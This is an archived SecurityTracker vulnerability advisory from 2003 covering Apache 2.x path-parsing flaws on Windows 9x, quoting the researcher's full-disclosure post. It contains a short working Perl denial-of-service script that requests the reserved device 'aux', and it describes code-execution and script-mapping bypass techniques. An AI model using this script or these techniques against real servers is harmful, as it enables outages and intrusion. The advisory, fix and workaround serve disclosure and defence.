SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Web Server/CGI)  >   Apache Vendors:   Apache Software Foundation
Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
SecurityTracker Alert ID:  1005963
SecurityTracker URL:  http://securitytracker.com/id/1005963
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 22 2003
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.0.43 and prior; 2.x branch only
Description:   Two vulnerabilities were reported in the Apache 2.x web server software when running on certain Microsoft Windows operating systems. A remote user can cause denial of service conditions. A remote user may also be able to execute arbitrary code.

It is reported that a remote user can request a reserved DOS device name (e.g., 'aux') to cause denial of service conditions on the server. According to the report, this may be due to a flaw in the ap_directory_walk function.

A demonstration exploit script is provided in the Source Message. The script makes the following request:

GET /aux HTTP/1.0

It is reported that although the Apache 2.0.44 release announcement states that previous Microsoft patches eliminate this vulnerability, the vulnerability still exists in Apache 2.x versions prior to 2.0.44 when some specific DOS devices are opened with certain file permissions masks.

It is also reported that a remote user can exploit this flaw to execute arbitrary code on the system. A remote user can reportedly send a POST request to a device named 'con.xxx' in a ScriptAlias'ed directory to potentially cause the POST data to be executed by that interpreter.

According to the report, Apache 1.x versions are not affected by these bugs.

Impact:   A remote user can cause denial of service conditions on the server. A remote user may be able to execute arbitrary code on the server with the privileges of the server.
Solution:   The vendor has released a fixed version (2.0.44), available at:

http://httpd.apache.org/dist/httpd

The author of the report has provided some workarounds, described in the Source Message.

Vendor URL:  httpd.apache.org/ (Links to External Site)
Cause:   Input validation error, Resource error
Underlying OS:   Windows (Me), Windows (95), Windows (98)

Message History:   None.


 Source Message Contents

Date:  Wed, 22 Jan 2003 09:48:26 -0500
Subject:  [VulnWatch] Path Parsing Errata in Apache HTTP Server




Original Message:
-----------------
From: mattmurphy@kc.rr.com mattmurphy@kc.rr.com
Date: Wed, 22 Jan 2003 09:00:58 -0500
To: full-disclosure@lists.netsys.com
Subject: Path Parsing Errata in Apache HTTP Server



Path Parsing Errata in Apache HTTP Server

ABSTRACT

The Apache HTTP Server <http://httpd.apache.org/> powers a 
whopping two thirds of all internet web sites, offering such powerful 
features as SSI, pre-forked and multi-threaded MPMs, input and output 
filtering, advanced logging, dynamic actions, dynamic modules, 
reverse DNS, virtual hosting, and even SSL via a fully extensible 
interface.  It operates on an incredible number of platforms, including 
nearly all major Unix variants, Novell Netware and Microsoft Windows; 
Apache has also been ported to cygwin.

DESCRIPTION

The Apache HTTP Server contains several flaws related to its path 
mapping routines that could enable an attacker to cause Apache to 
handle files incorrectly, cause a system-wide denial of service, or 
possibly execute arbitrary code.

ANALYSIS

Issue 1 (VU#979793):

Exploitation of this condition leads to a remote denial of service against 
a Windows 9x system running Apache, and appears to be due to 
erroneous checks in the ap_directory_walk function.  A denial of service 
can be caused with a web browser by requesting a reserved device 
such as "aux":

--- Apache2-nuke.pl ---
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1 || @ARGV > 2) {
	print STDOUT "Usage: perl $0 <host> <port=80>";
	exit;
}
if (@ARGV == 2) {
	$port = $ARGV[1];
} else {
	$port = 80;
}
$f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$ARGV[0], 
PeerPort=>$port);
print $f "GET /aux HTTP/1.0\r\n\r\n";
--- Apache2-nuke.pl ---

The Apache 2.0.44 release announcement incorrectly states that 
previous Microsoft patches eliminate this vulnerability.  There are some 
devices on Windows platforms that will hang the system if opened with 
certain file permissions masks.

Issue 2 (VU#825177):

Exploitation of this condition leads to a remote compromise.  This 
issue is also restricted to Windows 9x versions of Apache, and has the 
same underlying cause as the previously noted denial of service 
condition.  It is related to CGI input redirection.

Specifically, when POSTing to a CGI, the stdin stream points to the 
input form data.   By sending a POST to "con.xxx" in a ScriptAlias'ed 
directory, your POST data *may* be executed by that interpreter.

Issue 3 (VU#384033):

Exploitation of this condition could lead to bypass of default script 
mapping behavior.  This flaw impacts Apache on all platforms.  This 
issue is best described with an example:

http://localhost/folder.php/file

Apache should parse 'file' as plain text -- that is, simply returning it to 
the browser.  However, an incorrect check in Apache's mapping 
algorithms, causes the 'php' extension to be associated with this 
request.  Rather than checking only the file's extension, Apache checks 
for extensions in any path member, stopping at the first.

This is more of a weakness than a vulnerability, as exploitation only 
yields UID nobody if you allow uploading under the docroot *and* filter 
by filename only, in which case you have far more serious concerns 
than the exploitation of this issue.

DETECTION

These issues are believed to be specific to the 2.0 branch; Apache 
1.3.27 (and all other 1.x versions) are believed immune from these 
issues.  Apache 2.0.43 and prior should be upgraded to the 2.0.44 
release, which will be available from 
<http://httpd.apache.org/dist/httpd>.

WORKAROUNDS

* I recommend that servers running Windows 9x be upgraded to a 
production environment (Windows NT, 2000, or XP, for example).  This 
offers a solution to VU#979793, and VU#825177.

* A configuration workaround is available for VU#384033.  For any 
directories allowing uploads, add the following lines:

<Directory "/var/apache/htdocs/uploads/">
AllowOverride None
Options -Includes -ExecCGI
SetHandler default-handler
</Directory>

* All sites running Apache 2.0.43 and prior should be upgraded to 
2.0.44 if impacted by these issues.

DISCLOSURE TIMELINE

December 4, 2002: security@apache.org notified
December 5, 2002: Confirmation response received from William 
Rowe, Jr. (wrowe@rowe-clan.net); auditing begins.
December 5, 2002: cert@cert.org contacted
December 5, 2002: Automated response from CERT/CC incident 
response.
December 9, 2002: Follow-up received from William Rowe, Jr. 
indicates that cause of reserved device issue has been identified.
December 10, 2002: Initial patch binaries received from William Rowe, 
Jr. (libapr.dll and libhttpd.dll).  Fix for reserved device flaw confirmed, 
but dot-in-path attack remains.
December 10, 2002: CERT/CC response received from Chad 
Dougherty; vulnerability IDs are assigned.
December 10, 2002: Reply to Chad Dougherty indicating that precise 
details of VU#825177 will not be immediately disclosed.
December 10, 2002: Reply to William Rowe, Jr. requesting 
confirmation of status and receipt of VU#384033.
December 10/11, 2002: Series of e-mail communications to clarify the 
impacts/origins of VU#384033; source of issue is identified.
January 20, 2002: Apache 2.0.44 released
January 22, 2002: Public disclosure

--------------------------------------------------------------------
mail2web - Check your email from the web at
http://mail2web.com/ .




 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC